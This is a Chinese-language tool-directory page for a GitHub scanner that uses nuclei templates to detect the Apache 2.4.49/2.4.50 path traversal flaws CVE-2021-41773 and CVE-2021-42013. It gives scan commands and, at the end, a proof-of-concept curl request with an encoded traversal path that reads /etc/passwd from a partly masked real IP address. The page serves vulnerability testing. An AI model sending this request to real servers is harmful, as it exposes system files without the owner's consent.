Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
apache-vulnerable — 检测Apache HTTP服务器路径遍历漏洞(CVE-2021-41773, CVE-2021-42013),通过检查各种遍历技术暴露的/etc/passwd文件。 | Kitploit
工具/GitHubGitHub/psibot/apache-vulnerable
漏洞扫描器Web漏洞扫描器漏洞分析漏洞利用Web安全渗透测试
GitHubpsibot/apache-vulnerable

apache-vulnerable

检测Apache HTTP服务器路径遍历漏洞(CVE-2021-41773, CVE-2021-42013),通过检查各种遍历技术暴露的/etc/passwd文件。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

扫描Apache版本的"零日漏洞"

Apache 版本 2.4.49 和 2.4.50

(CVE-2021-41773) 和 (CVE-2021-42013)

使用方法:

你需要安装 nuclei!

https://github.com/projectdiscovery/nuclei

检查本地 nuclei 安装并验证模板

nuclei -t apache-vulnerable-versions.yaml -vv

以及

nuclei -t apache-path-traversal-rce-v2.yaml -vv

你应该会看到

[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high]

以及

[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]

扫描目标:

nuclei --silent -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port

扫描文件中的目标:

nuclei --silent -t apache-vulnerable-versions.yaml -l hosts.txt

关于 Nuclei 模板的信息

apache-vulnerable-versions.yaml - 检测Apache版本,如果存在漏洞则输出 HIGH。

apache-vulnerable-versions.yaml

apache-path-traversal-rce-v2.yaml - 将运行一个漏洞利用,并显示存在漏洞的路径。如果存在漏洞则输出 CRITICAL。

apache-path-traversal-rce-v2.yaml

POC(概念验证):

curl -s -k https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

POC

下载工具